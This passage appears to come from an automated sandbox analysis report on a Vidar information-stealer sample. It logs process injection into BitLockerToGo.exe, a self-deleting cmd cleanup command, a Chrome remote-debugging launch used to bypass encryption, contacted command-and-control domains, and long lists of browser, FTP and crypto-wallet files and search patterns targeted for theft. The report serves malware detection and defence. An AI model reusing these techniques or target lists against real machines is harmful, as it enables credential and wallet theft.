            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ABD1E FindFirstFileA,4_2_004ABD1E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004818DA FindFirstFileA,4_2_004818DA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A8DDA GetLogicalDriveStringsA,4_2_004A8DDA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049F9A3 GetSystemInfo,4_2_0049F9A3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: DyM4yXX.exe, 00000000.00000002.1983961478.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 480000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 480000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 243008Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 480000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 481000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4BB000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C7000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4D5000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4D6000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4D7000Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\riwlf" & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,4_2_0049F6B3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AD98B EntryPoint,GetUserNameW,4_2_004AD98B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049F53D GetTimeZoneInformation,4_2_0049F53D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000003.2047747108.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3428, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
            Tries to harvest and steal Bitcoin Wallet information
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3428, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Attempt to bypass Chrome Application-Bound Encryption
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000003.2047747108.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3428, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            Create Account            		311
            Process Injection            		1
            Masquerading            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		1
            Credentials in Registry            		1
            Security Software Discovery            		Remote Desktop Protocol4
            Data from Local System            		1
            Remote Access Software            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Extra Window Memory Injection            		311
            Process Injection            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Extra Window Memory Injection            		LSA Secrets1
            Account Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            System Owner/User Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586677 Sample: DyM4yXX.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 32 r2build.shop 2->32 34 t.me 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 7 other signatures 2->54 9 DyM4yXX.exe 2->9         started        signatures3 process4 signatures5 56 Writes to foreign memory regions 9->56 58 Allocates memory in foreign processes 9->58 60 Injects a PE file into a foreign processes 9->60 12 BitLockerToGo.exe 28 9->12         started        process6 dnsIp7 42 r2build.shop 94.130.191.182, 443, 49737, 49738 HETZNER-ASDE Germany 12->42 44 t.me 149.154.167.99, 443, 49736 TELEGRAMRU United Kingdom 12->44 46 127.0.0.1 unknown unknown 12->46 62 Attempt to bypass Chrome Application-Bound Encryption 12->62 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 12->66 68 4 other signatures 12->68 16 chrome.exe 12->16         started        19 cmd.exe 1 12->19         started        signatures8 process9 dnsIp10 28 192.168.2.4, 138, 443, 49723 unknown unknown 16->28 30 239.255.255.250 unknown Reserved 16->30 21 chrome.exe 16->21         started        24 conhost.exe 19->24         started        26 timeout.exe 1 19->26         started        process11 dnsIp12 36 www.google.com 142.250.185.100, 443, 49749, 49750 GOOGLEUS United States 21->36 38 play.google.com 142.250.186.46, 443, 49760, 49763 GOOGLEUS United States 21->38 40 2 other IPs or domains 21->40

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DyM4yXX.exe21%ReversingLabs
            DyM4yXX.exe100%AviraTR/Crypt.XPACK.Gen
            DyM4yXX.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://r2build.shop/:100%Avira URL Cloudmalware
            https://r2build.shop/1100%Avira URL Cloudmalware
            https://r2build.shop/ge100%Avira URL Cloudmalware
            https://r2build.shop100%Avira URL Cloudmalware
            https://r2build.shop/~100%Avira URL Cloudmalware
            https://r2build.shop/(100%Avira URL Cloudmalware
            https://r2build.shop/v100%Avira URL Cloudmalware
            https://r2build.shop/X100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            plus.l.google.com
